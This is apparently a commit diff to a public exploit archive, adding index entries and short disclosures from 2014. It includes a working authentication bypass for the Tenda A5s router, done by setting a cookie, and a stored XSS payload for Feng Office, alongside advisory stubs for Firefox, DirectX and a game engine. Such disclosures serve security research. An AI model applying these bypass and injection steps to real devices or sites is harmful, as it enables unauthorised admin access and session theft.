Updated 08_20_2014

files.csv

@@ -30873,6 +30873,7 @@ id,file,description,date,author,platform,type,port
 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
+34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0
 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
@@ -30941,6 +30942,10 @@ id,file,description,date,author,platform,type,port
 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0
+34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0
 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0
 34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0
+34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow Vulnerability",2010-07-20,J23,linux,remote,0
 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
+34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0
+34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80

platforms/hardware/webapps/34361.txt

@@ -0,0 +1,27 @@
+-----------------------------------------------------------------------
+          Tenda A5s Router Authentication Bypass Vulnerability
+-----------------------------------------------------------------------
+Author      : zixian
+Mail        : me@zixian.org
+Date        : Aug, 17-2014
+ 
+Vendor      : http://tenda.com.cn/
+Link        : http://tenda.com.cn/Catalog/Product/223
+Version     : V3.02.05_CN
+CVE         : CVE-2014-5246
+ 
+Exploit & p0c
+_____________
+ 
+go to
+    http://192.168.2.1/
+ 
+then set cookie with javascript
+ 
+    javascript:document.cookie='admin:language=zh-cn'
+
+go to
+    http://192.168.2.1/advance.asp
+
+you are the admin!
+_____________

platforms/linux/remote/34358.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/41842/info
+
+Mozilla Firefox and SeaMonkey are prone to a buffer-overflow vulnerability.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into viewing a page containing malicious content. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the user running the affected application.
+
+This issue is fixed in:
+
+Firefox 3.6.7
+Firefox 3.5.11
+SeaMonkey 2.0.6
+
+NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it. 
+
+http://www.exploit-db.com/sploits/34358.zip

platforms/multiple/dos/34360.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41851/info
+
+Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability.
+
+An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible.
+
+http://www.exploit-db.com/sploits/34360.zip

platforms/php/webapps/34277.txt

@@ -0,0 +1,20 @@
+# Affected software: Feng Office - URL: http://www.fengoffice.com/web/demo.php
+# Discovered by: Provensec
+# Website: http://www.provensec.com
+# Type of vulnerability: XSS Stored
+#
+# Feng Office is a Collaboration tool that includes a CRM, Communication,
+Document Management, Tasks, E-mails, Documents, Internal messages, Time
+tracking,
+Billing, Calendar, Gantt Charts, Reminders, and more.
+#
+# Description: Feng Office is prone to a Persistent Cross Site Scripting
+attack that allows a malicious user to inject HTML or scripts that can
+access any cookies, session tokens, or other
+sensitive information retained by your browser and used with that site.
+# Proof of concept:
+# 1. Create or Edit a client
+# 2. Complete the field Name ( customer[name] ) using this value:
+"><script>alert('XSS by Provensec')</script>
+# 3. Save changes.
+# 4. Share your client in the Activity feed to infect others.

platforms/windows/dos/34355.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41794/info
+
+Microsoft DirectX is prone to multiple denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to interrupt existing sessions or crash or freeze the application that uses DirectX, resulting in denial-of-service conditions. 
+
+http://www.exploit-db.com/sploits/34355.zip